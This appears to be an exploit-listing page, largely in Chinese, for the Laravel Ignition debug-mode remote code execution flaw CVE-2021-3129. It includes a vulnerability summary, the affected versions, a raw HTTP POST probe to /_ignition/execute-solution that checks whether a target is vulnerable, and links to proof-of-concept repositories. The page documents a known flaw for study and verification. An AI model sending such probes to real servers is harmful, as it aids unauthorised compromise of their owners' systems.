Exploit for Vulnerability in Facade Ignition CVE-2021-3129

## https://sploitus.com/exploit?id=7391B704-6E84-5129-A413-83DD4C822DCA
# CVE-2021-3129
Laravel RCE CVE-2021-3129

# 漏洞概述
当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。


# 影响版本
Laravel <= 8.4.2


# 漏洞验证
- 返回 500 证明存在漏洞
```
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution&parameters[variableName]=cve20213129&parameters[viewFile]=null
```


# 利用脚本
![image](https://github.com/keyuan15/CVE-2021-3129/blob/main/img/Pasted%20image%2020230311223255.png)


# 参考
[[CVE-2021-3129]Laravel Debug mode RCE复现 | tyskillのBlog](https://tyskill.github.io/posts/cve_2021_3129/)

[SNCKER/CVE-2021-3129: Laravel debug rce (github.com)](https://github.com/SNCKER/CVE-2021-3129)

[zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129) (github.com)](https://github.com/zhzyker/CVE-2021-3129)